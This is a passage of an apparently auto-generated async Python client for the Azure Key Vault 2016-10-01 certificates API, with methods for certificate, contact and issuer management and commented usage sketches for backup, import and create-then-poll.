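# `secret_bundle_backup` field are taken from the v2016_10_01 models and should be
# verified against the installed package).
#
#     from azure.keyvault.v2016_10_01 import models as _kv_models
#
#     async def backup_and_restore(client, source_vault, target_vault, name):
#         backup = await client.backup_secret(source_vault, name)       # BackupSecretResult
#         params = _kv_models.SecretRestoreParameters(
#             secret_bundle_backup=backup.value)                        # opaque backup blob
#         restored = await client.restore_secret(target_vault, params)  # SecretBundle
#         return restored.id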
def get_certificates(
self,
vault_base_url: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.CertificateListResult"]:
"""List certificates in a specified key vault.
The GetCertificates operation returns the set of certificate resources in the specified key
vault. This operation requires the certificates/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified, the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator-like instance of either CertificateListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.CertificateListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_certificates.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('CertificateListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_certificates.metadata = {'url': '/certificates'} # type: ignore
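# Paging sketch (assumption: `client` is an authenticated instance of this class).
# get_certificates is not awaited directly; it returns an AsyncItemPaged that yields
# CertificateItem objects and follows next_link continuation transparently.
#
#     async def list_certificates(client, vault_url):
#         async for item in client.get_certificates(vault_url, maxresults=25):
#             print(item.id)  # e.g. https://myvault.vault.azure.net/certificates/<name>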
async def delete_certificate(
self,
vault_base_url: str,
certificate_name: str,
**kwargs: Any
) -> "_models.DeletedCertificateBundle":
"""Deletes a certificate from a specified key vault.
Deletes all versions of a certificate object along with its associated policy. The delete
certificate operation cannot be used to remove individual versions of a certificate object. This
operation requires the certificates/delete permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeletedCertificateBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.DeletedCertificateBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedCertificateBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.delete_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DeletedCertificateBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_certificate.metadata = {'url': '/certificates/{certificate-name}'} # type: ignore
async def set_certificate_contacts(
self,
vault_base_url: str,
contacts: "_models.Contacts",
**kwargs: Any
) -> "_models.Contacts":
"""Sets the certificate contacts for the specified key vault.
Sets the certificate contacts for the specified key vault. This operation requires the
certificates/managecontacts permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param contacts: The contacts for the key vault certificate.
:type contacts: ~azure.keyvault.v2016_10_01.models.Contacts
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Contacts, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.Contacts
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Contacts"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.set_certificate_contacts.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(contacts, 'Contacts')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('Contacts', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
set_certificate_contacts.metadata = {'url': '/certificates/contacts'} # type: ignore
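# Hedged example (assumptions: `client` is an authenticated instance of this class; the
# Contacts/Contact model fields are taken from azure.keyvault.v2016_10_01.models and
# should be verified against the installed package).
#
#     from azure.keyvault.v2016_10_01 import models as _kv_models
#
#     async def set_contacts(client, vault_url):
#         contacts = _kv_models.Contacts(contact_list=[
#             _kv_models.Contact(email_address="admin@contoso.com", name="Admin"),
#         ])
#         return await client.set_certificate_contacts(vault_url, contacts)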
async def get_certificate_contacts(
self,
vault_base_url: str,
**kwargs: Any
) -> "_models.Contacts":
"""Lists the certificate contacts for a specified key vault.
The GetCertificateContacts operation returns the set of certificate contact resources in the
specified key vault. This operation requires the certificates/managecontacts permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Contacts, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.Contacts
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Contacts"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_certificate_contacts.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('Contacts', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_certificate_contacts.metadata = {'url': '/certificates/contacts'} # type: ignore
async def delete_certificate_contacts(
self,
vault_base_url: str,
**kwargs: Any
) -> "_models.Contacts":
"""Deletes the certificate contacts for a specified key vault.
Deletes the certificate contacts for a specified key vault. This operation requires
the certificates/managecontacts permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Contacts, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.Contacts
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Contacts"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.delete_certificate_contacts.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('Contacts', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_certificate_contacts.metadata = {'url': '/certificates/contacts'} # type: ignore
def get_certificate_issuers(
self,
vault_base_url: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.CertificateIssuerListResult"]:
"""List certificate issuers for a specified key vault.
The GetCertificateIssuers operation returns the set of certificate issuer resources in the
specified key vault. This operation requires the certificates/manageissuers/getissuers
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified, the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator-like instance of either CertificateIssuerListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.CertificateIssuerListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateIssuerListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_certificate_issuers.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('CertificateIssuerListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_certificate_issuers.metadata = {'url': '/certificates/issuers'} # type: ignore
async def set_certificate_issuer(
self,
vault_base_url: str,
issuer_name: str,
parameter: "_models.CertificateIssuerSetParameters",
**kwargs: Any
) -> "_models.IssuerBundle":
"""Sets the specified certificate issuer.
The SetCertificateIssuer operation adds or updates the specified certificate issuer. This
operation requires the certificates/setissuers permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param issuer_name: The name of the issuer.
:type issuer_name: str
:param parameter: Certificate issuer set parameter.
:type parameter: ~azure.keyvault.v2016_10_01.models.CertificateIssuerSetParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: IssuerBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.IssuerBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IssuerBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.set_certificate_issuer.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'issuer-name': self._serialize.url("issuer_name", issuer_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameter, 'CertificateIssuerSetParameters')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('IssuerBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
set_certificate_issuer.metadata = {'url': '/certificates/issuers/{issuer-name}'} # type: ignore
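# Illustrative sketch only (assumptions: `client` is an authenticated instance of this
# class; `provider` is the only CertificateIssuerSetParameters field shown, and the
# provider name below is a placeholder; credentials and organization details are omitted).
#
#     from azure.keyvault.v2016_10_01 import models as _kv_models
#
#     async def add_issuer(client, vault_url):
#         params = _kv_models.CertificateIssuerSetParameters(provider="Test")  # placeholder
#         issuer = await client.set_certificate_issuer(vault_url, "my-issuer", params)
#         return issuer.provider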
async def update_certificate_issuer(
self,
vault_base_url: str,
issuer_name: str,
parameter: "_models.CertificateIssuerUpdateParameters",
**kwargs: Any
) -> "_models.IssuerBundle":
"""Updates the specified certificate issuer.
The UpdateCertificateIssuer operation performs an update on the specified certificate issuer
entity. This operation requires the certificates/setissuers permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param issuer_name: The name of the issuer.
:type issuer_name: str
:param parameter: Certificate issuer update parameter.
:type parameter: ~azure.keyvault.v2016_10_01.models.CertificateIssuerUpdateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: IssuerBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.IssuerBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IssuerBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_certificate_issuer.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'issuer-name': self._serialize.url("issuer_name", issuer_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameter, 'CertificateIssuerUpdateParameters')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('IssuerBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_certificate_issuer.metadata = {'url': '/certificates/issuers/{issuer-name}'} # type: ignore
async def get_certificate_issuer(
self,
vault_base_url: str,
issuer_name: str,
**kwargs: Any
) -> "_models.IssuerBundle":
"""Lists the specified certificate issuer.
The GetCertificateIssuer operation returns the specified certificate issuer resource in the
specified key vault. This operation requires the certificates/manageissuers/getissuers
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param issuer_name: The name of the issuer.
:type issuer_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: IssuerBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.IssuerBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IssuerBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_certificate_issuer.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'issuer-name': self._serialize.url("issuer_name", issuer_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('IssuerBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_certificate_issuer.metadata = {'url': '/certificates/issuers/{issuer-name}'} # type: ignore
async def delete_certificate_issuer(
self,
vault_base_url: str,
issuer_name: str,
**kwargs: Any
) -> "_models.IssuerBundle":
"""Deletes the specified certificate issuer.
The DeleteCertificateIssuer operation permanently removes the specified certificate issuer from
the vault. This operation requires the certificates/manageissuers/deleteissuers permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param issuer_name: The name of the issuer.
:type issuer_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: IssuerBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.IssuerBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IssuerBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.delete_certificate_issuer.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'issuer-name': self._serialize.url("issuer_name", issuer_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('IssuerBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_certificate_issuer.metadata = {'url': '/certificates/issuers/{issuer-name}'} # type: ignore
async def create_certificate(
self,
vault_base_url: str,
certificate_name: str,
parameters: "_models.CertificateCreateParameters",
**kwargs: Any
) -> "_models.CertificateOperation":
"""Creates a new certificate.
If this is the first version, the certificate resource is created. This operation requires the
certificates/create permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:param parameters: The parameters to create a certificate.
:type parameters: ~azure.keyvault.v2016_10_01.models.CertificateCreateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificateOperation, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificateOperation
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateOperation"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str', pattern=r'^[0-9a-zA-Z-]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'CertificateCreateParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificateOperation', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_certificate.metadata = {'url': '/certificates/{certificate-name}/create'} # type: ignore
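# Hedged sketch of create-then-poll (assumptions: `client` is an authenticated instance of
# this class; the CertificatePolicy shape below, IssuerParameters and
# X509CertificateProperties, follows the v2016_10_01 models and should be checked against
# the installed package).
#
#     import asyncio
#     from azure.keyvault.v2016_10_01 import models as _kv_models
#
#     async def create_and_wait(client, vault_url, name):
#         policy = _kv_models.CertificatePolicy(
#             issuer_parameters=_kv_models.IssuerParameters(name="Self"),
#             x509_certificate_properties=_kv_models.X509CertificateProperties(
#                 subject="CN=example.com", validity_in_months=12))
#         params = _kv_models.CertificateCreateParameters(certificate_policy=policy)
#         op = await client.create_certificate(vault_url, name, params)  # HTTP 202
#         while op.status == "inProgress":
#             await asyncio.sleep(5)
#             op = await client.get_certificate_operation(vault_url, name)
#         return op.status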
async def import_certificate(
self,
vault_base_url: str,
certificate_name: str,
parameters: "_models.CertificateImportParameters",
**kwargs: Any
) -> "_models.CertificateBundle":
"""Imports a certificate into a specified key vault.
Imports an existing valid certificate, containing a private key, into Azure Key Vault. The
certificate to be imported can be in either PFX or PEM format. If the certificate is in PEM
format, the PEM file must contain the key as well as the x509 certificates. This operation requires
the certificates/import permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:param parameters: The parameters to import the certificate.
:type parameters: ~azure.keyvault.v2016_10_01.models.CertificateImportParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificateBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificateBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.import_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str', pattern=r'^[0-9a-zA-Z-]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'CertificateImportParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificateBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
import_certificate.metadata = {'url': '/certificates/{certificate-name}/import'} # type: ignore
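# Hedged example (assumptions: `client` is an authenticated instance of this class and
# `pfx_bytes` holds the raw PFX file; `base64_encoded_certificate` and `password` are
# fields of CertificateImportParameters in the v2016_10_01 models).
#
#     import base64
#     from azure.keyvault.v2016_10_01 import models as _kv_models
#
#     async def import_pfx(client, vault_url, name, pfx_bytes, pfx_password):
#         params = _kv_models.CertificateImportParameters(
#             base64_encoded_certificate=base64.b64encode(pfx_bytes).decode(),
#             password=pfx_password)
#         return await client.import_certificate(vault_url, name, params)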
def get_certificate_versions(
self,
vault_base_url: str,
certificate_name: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.CertificateListResult"]:
"""List the versions of a certificate.
The GetCertificateVersions operation returns the versions of a certificate in the specified key
vault. This operation requires the certificates/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:param maxresults: Maximum number of results to return in a page. If not specified, the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator-like instance of either CertificateListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.CertificateListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
